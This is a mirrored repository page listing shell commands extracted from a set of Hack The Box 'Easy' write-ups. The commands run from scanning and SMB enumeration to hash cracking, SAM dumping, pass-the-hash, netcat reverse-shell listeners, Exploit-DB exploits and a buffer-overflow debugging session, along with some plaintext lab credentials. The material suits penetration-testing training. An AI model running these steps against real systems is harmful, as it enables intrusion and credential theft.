oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 04:16:59 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
hacking-blogposts/commands.md

19 KiB
Raw Blame History

ip=10.10.14.48 port=9005 course=2

Easy/26.html:  λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Teacher] → nc -lvnp 9005
Easy/26.html:  → hash-identifier
Easy/11.html:  λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.40
Easy/28.html:  → nmap -F 10.10.10.123
Easy/28.html:  → nmap -sC -sV 10.10.10.123 -p 21,22,53,80,139,443,445
Easy/28.html:  λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbmap -H 10.10.10.123 -p 445,139
Easy/28.html:→ enum4linux 10.10.10.123
Easy/28.html:→ smbclient \\\\10.10.10.123\\general
Easy/28.html:→ mv creds.txt Friendzone/creds.txt
Easy/28.html:→ mkdir Friendzone
Easy/28.html:→ mv creds.txt Friendzone/creds.txt
Easy/28.html:→ cd Friendzone
Easy/28.html:→ cat creds.txt
Easy/28.html:  → nmap 10.10.10.123 --script smb-enum-shares
Easy/28.html:  λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → pacman -S blackarch/python2-dnsknife
Easy/28.html:  λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → dig axfr @10.10.10.123 friendzone.red
Easy/28.html:  λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbclient -H //10.10.10.123/Development
Easy/28.html:λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001
Easy/28.html:  λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001
Easy/36.html:  → nmap -F 10.10.10.149
Easy/36.html:  → nmap -sCV -p80,135,445 10.10.10.149
Easy/36.html:  → git clone https://github.com/theevilbit/ciscot7
Easy/36.html:  → cd ciscot7
Easy/36.html:  → ls                                                                                                        [21af318]
Easy/36.html:  → python ciscot7.py -p 0242114B0E143F015F5D1E161713                                                         [21af318]
Easy/36.html:  → python ciscot7.py -p 02375012182C1A1D751618034F36415408                                                   [21af318]
Easy/36.html:  → echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' >> cis.md5                                                          [21af318]
Easy/36.html:  → cat cis.md5                                                                                               [21af318]
Easy/36.html:  → hashcat -m 500                                                                                            [21af318]
Easy/36.html:  → hashcat -m 500 cis.md5 /usr/share/wordlists/rockyou.txt                                                   [21af318]
Easy/36.html:→ nano users.txt
Easy/36.html:→ nano pass.txt
Easy/36.html:→ crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt
Easy/36.html:  → msfdb init
Easy/36.html:  → msfconsole
Easy/36.html:→ locate psexec.py
Easy/36.html:→ cd /usr/share/doc/python3-impacket/examples/
Easy/36.html:→ ls
Easy/36.html:→ python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149
Easy/36.html:  → python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149
Easy/36.html:  → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt
Easy/36.html:  → git clone https://github.com/Hackplayers/evil-winrm
Easy/36.html:  → cd evil-winrm
Easy/36.html:  → cat Gemfile                                                                                                [e501272]
Easy/36.html:  → gem install winrm winrm-fs stringio                                                                        [e501272]
Easy/36.html:  → sudo !!                                                                                                    [e501272]
Easy/36.html:  → sudo gem install winrm winrm-fs stringio                                                                   [e501272]
Easy/36.html:  → ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149                                          [e501272]
Easy/36.html:  → wget https://download.sysinternals.com/files/SysinternalsSuite.zip
Easy/36.html:  → mv ~/Downloads/SysinternalsSuite.zip .
Easy/36.html:  → unzip SysinternalsSuite.zip
Easy/36.html:  → strings firefox.exe_200218_153036.dmp | grep pass                                                          [e501272]
Easy/36.html:  → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares
Easy/36.html:→ python3 psexec.py administrator@10.10.10.149
Easy/31.html:  → nmap -F 10.10.10.134
Easy/31.html:  → nmap -sCV -p22,135,139,445 10.10.10.134
Easy/31.html:  λ root [ 10.10.14.48/23 ] [nihilist/_HTB/] → smbclient -L //10.10.10.134/ -U ""
Easy/31.html:  → smbclient //10.10.10.134/Backups
Easy/31.html:  λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bastion] → cat note.txt
Easy/31.html:→ mount -t cifs //10.10.10.134/Backups mount
Easy/31.html:→ ls && cd mount
Easy/31.html:→ ls
Easy/31.html:  → smbmap -u nihilist -H 10.10.10.134
Easy/31.html:  → ls
Easy/31.html:  → ls
Easy/31.html:  → du -hs WindowsImageBackup
Easy/31.html:  → cd WindowsImageBackup
Easy/31.html:  → cd L4mpje-PC
Easy/31.html:  → ls
Easy/31.html:  → cd Backup\ 2019-02-22\ 124351
Easy/31.html:  → du -hs *
Easy/31.html:  → guestmount
Easy/31.html:  → apt install libguestfs-tools && guestmount --help
Easy/31.html:  → mkdir /home/nihilist/_HTB/Bastion/vhd
Easy/31.html:  → guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /home/nihilist/_HTB/Bastion/vhd
Easy/31.html:  → cd /home/nihilist/_HTB/Bastion
Easy/31.html:  → cd vhd
Easy/31.html:  → ls
Easy/31.html:→ find Desktop Documents Downloads -ls
Easy/31.html:  → cd ../..
Easy/31.html:  → cd Windows/System32/config
Easy/31.html:  → ls
Easy/31.html:  → cp SAM SYSTEM /home/nihilist/_HTB/Bastion
Easy/31.html:  → cd ../../../..
Easy/31.html:  → ls
Easy/31.html:  → file SAM SYSTEM
Easy/31.html:  → mkdir backup && mv SAM backup/ && mv SYSTEM backup/
Easy/31.html:  → cd backup
Easy/31.html:  → ls
Easy/31.html:  → impacket-secretsdump -sam SAM -system SYSTEM local
Easy/31.html:→ smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134
Easy/31.html:→ ssh L4mpje@10.10.10.134
Easy/31.html:  → cd vhd
Easy/31.html:  → ls
Easy/31.html:  → cd Windows/System32/config
Easy/31.html:  → ls -lash | grep SAM
Easy/31.html:  → ls -lash | grep SYSTEM
Easy/31.html:  → cd ../../..
Easy/31.html:  → cd ..
Easy/31.html:  → curl -sk https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1 > jaws-enum.ps1
Easy/31.html:  → ifconfig | grep inet
Easy/31.html:  → python -m SimpleHTTPServer 8080
Easy/31.html:→ curl -sk https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py > mremoteng.py
Easy/31.html:→ python3 mremoteng.py
Easy/31.html:  → python3 mremoteng.py -s yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB
Easy/31.html:  → python3 mremoteng.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Easy/31.html:→ ssh Administrator@10.10.10.134
Easy/31.html:  → ssh Administrator@10.10.10.134
Easy/15.html:  λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.68
Easy/15.html:            λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.68/
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nano rev.php
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → cat rev.php
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80
Easy/15.html:  λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001
Easy/15.html:  λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → curl -vsk http://10.10.10.68/uploads/rev.php
Easy/15.html:  λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001
Easy/15.html:  λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → searchsploit kernel 4.4
Easy/15.html:  λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → locate 44298.c
Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → cp /usr/share/exploitdb/exploits/linux/local/44298.c .
Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → gcc -o 44298 -m64 44298.c
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → ls
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80
Easy/22.html:  → nmap 10.10.10.98 -F
Easy/22.html:→ nmap -sCV 10.10.10.98
Easy/22.html:→ ftp 10.10.10.98
Easy/22.html:→ 7z x Access\ Control.zip
Easy/22.html:→ ls
Easy/22.html:→ file backup.mdb
Easy/22.html:  → 7z x Access\ Control.zip -paccess4u@security
Easy/22.html:  → ls
Easy/22.html:  → file Access\ Control.pst
Easy/22.html:  λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Access] → telnet 10.10.10.98
Easy/16.html:  λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.75
Easy/16.html:   λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.75/
Easy/16.html:  λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.75/nibbleblog/
Easy/16.html:λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Nibbleblog 4.0.3
Easy/16.html:  λ nihilist [ 10.10.14.48/23 ] [~] → msfconsole
Easy/33.html:  → nmap -F 10.10.10.138
Easy/33.html:→ nmap -sCV -p80 10.10.10.138
Easy/33.html:  → echo '10.10.10.138 writeup.htb' >> /etc/hosts
Easy/33.html:  → curl -sk http://writeup.htb/
Easy/33.html:  → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50
Easy/33.html:  → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50
Easy/33.html:  → nikto -h http://10.10.10.138/
Easy/33.html:  → curl -sk http://10.10.10.138/robots.txt
Easy/33.html:  → curl -sk http://10.10.10.138/writeup/ | grep CMS
Easy/33.html:→ searchsploit CMS Made Simple | grep Injection
Easy/33.html:→ locate 46635.py
Easy/33.html:→ cp /usr/share/exploitdb/exploits/php/webapps/46635.py .
Easy/33.html:→ nano 46635.py
Easy/33.html:→ python 46635.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt
Easy/33.html:  → ssh jkr@writeup.htb
Easy/33.html:→ cat nihilist.py
Easy/33.html:→ python -m SimpleHTTPServer 8080
Easy/33.html:→ nc -lvnp 1234
Easy/33.html:  → ssh jkr@10.10.10.138
Easy/33.html:→ nc -lvnp 1234
Easy/35.html:  → nmap -F 10.10.10.147 --top-ports 10000 -vvv
Easy/35.html:  → nmap -sCV -p22,80,1337 10.10.10.147
Easy/35.html:  → nikto -h http://10.10.10.147/
Easy/35.html:  → dirsearch -u http://10.10.10.147/ -e php,html,txt,js
Easy/35.html:  → ls
Easy/35.html:  → file myapp
Easy/35.html:  → chmod +x myapp
Easy/35.html:  → gdb ./myapp
Easy/35.html:→ wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh
Easy/35.html:→ gdb -q myapp
Easy/35.html:$rcx   : 0x00007ffff7edc904  →  0x5477fffff0003d48 ("H="?)
Easy/35.html:$rdx   : 0x00007ffff7fad580  →  0x0000000000000000
Easy/35.html:$rsp   : 0x00007fffffffe438  →  "AAAAAAAA"
Easy/35.html:$rsi   : 0x00000000004052a0  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
Easy/35.html:$rip   : 0x00000000004011ac  →  <****main+77> ret
Easy/35.html:$r12   : 0x0000000000401070  → <_start+0> xor ebp, ebp
Easy/35.html:$r13   : 0x00007fffffffe510  →  0x0000000000000001
Easy/35.html:0x00007fffffffe448│+0x0010: 0x00007fffffffe518  →  0x00007fffffffe774  →  "/home/nihilist/_HTB/Safe/Ghidra/myapp"
Easy/35.html:0x00007fffffffe458│+0x0020: 0x000000000040115f  →  <****main+0> push rbp
Easy/35.html:0x00007fffffffe470│+0x0038: 0x0000000000401070  → <_start+0> xor ebp, ebp
Easy/35.html: →   0x4011ac <****main+77>        ret
Easy/35.html:[#0] 0x4011ac → main()
Easy/35.html:$rcx   : 0x00007ffff7edc904  →  0x5477fffff0003d48 ("H="?)
Easy/35.html:$rdx   : 0x00007ffff7fad580  →  0x0000000000000000
Easy/35.html:$rsp   : 0x00007fffffffe438  →  "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"
Easy/35.html:$rsi   : 0x00000000004052a0  →  "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]"
Easy/35.html:$rip   : 0x00000000004011ac  → <****main+77> ret
Easy/35.html:$r12   : 0x0000000000401070  → <_start+0> xor ebp, ebp
Easy/35.html:$r13   : 0x00007fffffffe510  →  0x0000000000000001
Easy/35.html: →   0x4011ac <****main+77>        ret
Easy/35.html:[#0] 0x4011ac → main()
Easy/35.html:$rcx   : 0x00007ffff7edc904  →  0x5477fffff0003d48 ("H="?)
Easy/35.html:$rdx   : 0x00007ffff7fad580  →  0x0000000000000000
Easy/35.html:$rsp   : 0x00007fffffffe438  →  "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"
Easy/35.html:$rsi   : 0x00000000004052a0  →  "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]"
Easy/35.html:$rip   : 0x00000000004011ac  → <****main+77> ret
Easy/35.html:$r12   : 0x0000000000401070  → <_start+0> xor ebp, ebp
Easy/35.html:$r13   : 0x00007fffffffe510  →  0x0000000000000001
Easy/35.html:  → python -c 'print "X"*128 + "Y"*8 + "Z"*8'
Easy/35.html:  $rcx   : 0x00007ffff7edc904  →  0x5477fffff0003d48 ("H="?)
Easy/35.html:  $rdx   : 0x00007ffff7fad580  →  0x0000000000000000
Easy/35.html:  $rsp   : 0x00007fffffffe438  →  "XXXXXXXXYYYYYYYYZZZZZZZZ"
Easy/35.html:  $rsi   : 0x00000000004052a0  →  "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[...]"
Easy/35.html:  $rip   : 0x00000000004011ac  →  <****main+77> ret
Easy/35.html:  $r12   : 0x0000000000401070  → <_start+0> xor ebp, ebp
Easy/35.html:  $r13   : 0x00007fffffffe510  →  0x0000000000000001
Easy/35.html:→ nano exploit.py
Easy/35.html:  $rsp   : 0x00007fff98990520  →  0x0000000000000001
Easy/35.html:  $rip   : 0x00007fd2a202e090  →  <_start+0> mov rdi, rsp
Easy/35.html:  0x00007fff98990528│+0x0008: 0x00007fff98992748  →  0x00707061796d2f2e ("./myapp"?)
Easy/35.html:  0x00007fff98990538│+0x0018: 0x00007fff98992750  →  "APPDIR=/tmp/.mount_tmtxDoJV"
Easy/35.html:  0x00007fff98990540│+0x0020: 0x00007fff9899276c  →  "APPIMAGE=/tmp/tm"
Easy/35.html:  0x00007fff98990548│+0x0028: 0x00007fff9899277d  →  "COLORTERM=truecolor"
Easy/35.html:  0x00007fff98990550│+0x0030: 0x00007fff98992791  →  "DISPLAY=:0.0"
Easy/35.html:  0x00007fff98990558│+0x0038: 0x00007fff9899279e  →  "HOME=/root"
Easy/35.html:   → 0x7fd2a202e090 <_start+0>       mov    rdi, rsp
Easy/35.html:  [#0] 0x7fd2a202e090 → _start()
Easy/35.html:  $rax   : 0x000000000040115f  →  <****main+0> push rbp
Easy/35.html:  $rcx   : 0x00007fd2a2007718  →  0x00007fd2a2009a40  →  0x0000000000000000
Easy/35.html:  $rdx   : 0x00007fff98990538  →  0x00007fff98992750  →  "APPDIR=/tmp/.mount_tmtxDoJV"
Easy/35.html:  $rsp   : 0x00007fff98990440  →  0x00000000004011b0  → <__libc_csu_init+0> push r15
Easy/35.html:  $rbp   : 0x00007fff98990440  →  0x00000000004011b0  →  <__libc_csu_init+0> push r15
Easy/35.html:  $rsi   : 0x00007fff98990528  →  0x00007fff98992748  →  0x00707061796d2f2e ("./myapp"?)
Easy/35.html:  $rip   : 0x0000000000401163  →  <****main+4> sub rsp, 0x70
Easy/35.html:  $r8    : 0x00007fd2a2009a50  →  0x0000000000000004
Easy/35.html:  $r9    : 0x00007fd2a203c780  → <_dl_fini+0> push rbp
Easy/35.html:  $r12   : 0x0000000000401070  →  <_start+0> xor ebp, ebp
Easy/35.html:  $r13   : 0x00007fff98990520  →  0x0000000000000001
Easy/35.html:  0x00007fff98990440│+0x0000: 0x00000000004011b0  →  <__libc_csu_init+0> push r15  ← $rsp, $rbp
Easy/35.html:  0x00007fff98990448│+0x0008: 0x00007fd2a1e74bbb  →  <__libc_start_main+235> mov edi, eax
Easy/35.html:  0x00007fff98990458│+0x0018: 0x00007fff98990528  →  0x00007fff98992748  →  0x00707061796d2f2e ("./myapp"?)
Easy/35.html:  0x00007fff98990468│+0x0028: 0x000000000040115f  →  <****main+0> push rbp
Easy/35.html:   →   0x401163 <****main+4>         sub    rsp, 0x70
Easy/35.html:  [#0] 0x401163 → main()
Easy/35.html:→  0x401163 <****main+4>         sub    rsp, 0x70
Easy/35.html:→ objdump -D myapp | grep -i system
Easy/35.html:  → objdump -D myapp | grep -i test
Easy/35.html:  → nano exploit.py
Easy/35.html:  → python3 exploit.py
Easy/35.html:→ ssh-keygen -f safe
Easy/35.html:→ chmod 600 safe
Easy/35.html:→ cat safe.pub
Easy/35.html:  → scp -i ../Ghidra/safe user@10.10.10.147:MyPasswords.kdbx .
Easy/35.html:  → scp -i ../Ghidra/safe user@10.10.10.147:IMG_0547.JPG .
Easy/35.html:  → ls
Easy/35.html:  → file MyPasswords.kdbx
Easy/35.html:  → file IMG_0547.JPG
Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g"
Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" > keepass_hash
Easy/35.html:  → john -w:/usr/share/wordlists/rockyou.txt keepass_hash
Easy/5.html:**λ nihilist [nihilist/_HTB/Optimum] → nmap -sC -sV 10.10.10.8**
Easy/5.html:  **λ root [nihilist/_HTB/Optimum] → nikto -h http://10.10.10.8/**
Easy/5.html:  **λ root [nihilist/_HTB/Optimum] → searchsploit rejetto**
Easy/34.html:  → nmap -F 10.10.10.115
Easy/34.html:  → nmap -sCV -p22,80 10.10.10.115
Easy/34.html:→ echo "10.10.10.115 haystack.htb" >> /etc/hosts
Easy/34.html:  → dirsearch -u http://10.10.10.115/ -t 50 -e txt,php,html,js
Easy/34.html:→ nikto -h http://haystack.htb/
Easy/34.html:  → curl -sk http://haystack.htb/robots.txt | grep nginx
Easy/34.html:  → wget http://haystack.htb/needle.jpg
Easy/34.html:  → exiftool needle.jpg
Easy/34.html:  → strings needle.jpg
Easy/34.html:  → echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d
Easy/34.html:  → nmap -F 10.10.10.115 --top-ports 10000 -vvv
Easy/34.html:  → nmap -sCV -p9200 10.10.10.115
Easy/34.html:  → curl -sk http://haystack.htb:9200
Easy/34.html:  → curl -sk http://haystack.htb:9200/_cat/indices/\?v
Easy/34.html:→ curl -X POST http://haystack.htb:9200/\/_search
Easy/34.html:→ curl -X POST http://haystack.htb:9200/bank/_search
Easy/34.html:→ npm install elasticdump -g
Easy/34.html:→ elasticdump --input=http://10.10.10.115:9200/quotes --output=quotes.json --type=data
Easy/34.html:  → cat quotes.json| grep clave
Easy/34.html:  → echo "cGFzczogc3BhbmlzaC5pcy5rZXk=" | base64 -d
Easy/34.html:  → echo "dXNlcjogc2VjdXJpdHkg" | base64 -d
Easy/34.html:  → ssh security@haystack.htb
Easy/34.html:→ nano nihilist.js
Easy/34.html:→ python -m SimpleHTTPServer 8080
Easy/34.html:→ cat nihilist.js
Easy/34.html:→ nc -lvnp 9001
Easy/34.html:→ nc -lvnp 9001
Easy/34.html:  → nc -lvnp 9002

`**